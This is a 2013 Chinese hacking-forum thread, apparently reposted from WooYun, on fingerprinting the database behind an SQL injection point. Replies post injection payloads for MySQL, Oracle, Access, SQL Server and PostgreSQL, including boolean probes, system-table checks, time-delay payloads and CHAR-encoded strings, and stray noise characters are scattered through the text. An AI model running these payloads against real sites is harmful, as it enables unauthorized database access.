找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2119|回复: 0
打印 上一主题 下一主题

一个注射点如何最快速确认是什么类型数据库

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-11 09:54:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
一个注射点如何最快速确认是什么类型数据库
9 X' L8 e" {+ o2 Yxsser (十根阳具有长短!!) | 2013-02-05 12:36- B! q  a, S; ]; I' m
假设这么一个注射点:) O/ m+ s" A: L% ~0 _# h! Q
show.html?id=2
# `" P* z, R& S& Jmysql:id=2 and version()>0$ e0 Q7 A7 s6 C! I  B2 F
oracle:id=2 and '1'||'1'='11
) Z, q# e0 b: {1 _! \其他的欢迎补充
" ^* r5 z  ~. u9 ~2 M1#
3 g$ m* J6 e2 t: lupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:472 y$ |. f3 z( O% k% P
Access:
9 u; {$ C; C, y8 ?: l. c9 G4 xaNd aSc(cHr(97))=97
9 P2 |+ `* P# i+ _4 a+ [' s, p" ~and exists(select id from MSysAccessObjects)' [$ J  A# W0 U" ]* P( U) u/ H
SQL Server:" R; b- U' T/ P$ J; t& q$ q! w
and exists(select id from sysobjects)
& [7 e$ d! q1 Y& ]+ X6 C$ eand length(user)>0% z2 G( ^5 @" ^! [
MySQL:1 M: f. {' ]2 Z
and length(user())>0
3 k7 U* O* s% s1 y2 ~" l2#$ [5 ~6 r$ t9 T+ _& @$ v
xsser (十根阳具有长短!!) | 2013-02-05 12:48: U+ f4 @& p3 d/ {
@upload 如果这些都不是呢…
2 A% i7 v' T, Y6 F3 v7 B: m+ i# V3#
" D  q- y; k' x- C" @3 Zupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:033 m- s' x7 {9 e7 s& N! _
@xsser 不快速的,延时注入
8 m/ q3 X: h! l$ H不知道这样写对不对' ^8 C' p5 ?, b9 p
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
! I9 B1 L" m; F+ P/ ^mysql:id=2 and select benchmark(1e8,current_date());
4 c2 \. ~% m# _4 q9 w1 f4#  E  b7 C, B* }) ?+ N. B$ g! k
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
1 l1 H! x' q8 \' ]3 X最快的貌似是看报错信息
, P) y$ \0 s9 K4 Roracle error
& g5 n( _2 U0 z8 f  ?  cmssql error
, Q  W' @6 \* R: M) S6 q# \/ n- `% u0 ?mysql error& s5 f% O  o( T4 v! @( E4 w
5#
: j0 n; ^* L* g5 e! E4 c3 Y5 rNimda (你们都是坏银~) | 2013-02-05 13:14" k1 \  Q; ]0 F; X7 K5 f5 L! G
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
1 {  ?3 R( m1 e* R6#
3 l+ y9 \1 V; Xupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
% j$ \+ C/ Q/ F+ H- ^5 m4 ~0 w1 B/ d“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
6 t; K: `6 O  n5 f7 i  C/ D4 u“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:7 d5 a) N0 _3 V. t* o
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。! H0 I4 {, r0 x; R# b! ]& |5 N5 z# s0 e
7#
  b! S. S0 R' I! ?4 g_Evil (HackEnd) | 2013-02-05 13:330 q2 q: t, ?# w! |
PostgreSQL
2 E! x* a7 c& P8#9 V4 J% [) z# f1 F% e  `8 {
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42# ^. {! h! D; o) m6 Q9 X/ k; I& J
切换编码 and 1=1
: \* D, u/ B( A6 Woracle:
' d+ M; m% C5 k9 KCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
5 c9 B- I/ p: Z8 [. Kmssql:
2 |7 \2 A4 b: k# dCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
6 Z+ m7 z+ `( \1 o+ O7 amysql:0 `; P+ H- M) t2 \( i/ v( e  h* z
CHAR(97, 110, 100, 32, 49, 61, 49); S+ ?. N7 d" u+ |/ b5 |
9#1 b$ G4 c0 t( N- H* l$ f
xsser (十根阳具有长短!!) | 2013-02-05 14:31. Q) b+ l! v  f( A# G
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
' Z' P/ l3 F2 ~" L6 f& E- U1 b. @10#
4 ?/ y( y* L# p: Hupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
; i& h/ z. g# q0 U6 v  b@xsser 是奇葩数据库类型的么?
! d; S0 x1 Q/ k8 e2 @: o* N1 O根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
9 g+ n! N( T+ q0 D1.是否可以使用特定的函数来判断,该数据库特有的- X7 |' C0 v" d
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等  W" l/ w& V: @/ B
3.是否可以编码查询' [7 x  r) c- Q; X1 r: L7 J) y
4.是否显可以利用错信息
1 I- t# [( G/ F& p$ i- U3 ~7 p0 y& {5.是否存在数据库某些特性辅助判断1 y% v( w1 i" K; q5 E: t3 T
个人见解
& M3 A6 g" ?! F' I1 u11#) {- E( Q. L+ b4 L/ ?9 u& ]
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
8 F. t. r# Z& T已收藏,mssql可以直接看到错误提示的吧~. N( b  O' z7 w
12#
. F. c* c% x4 b3 |* Z6 w( c7 lPasser_by | 2013-02-05 15:090 Y$ E0 \# s6 U9 m. K. g* c
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。$ D: M/ U# {' R8 O
from:http://zone.wooyun.org/content/260
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表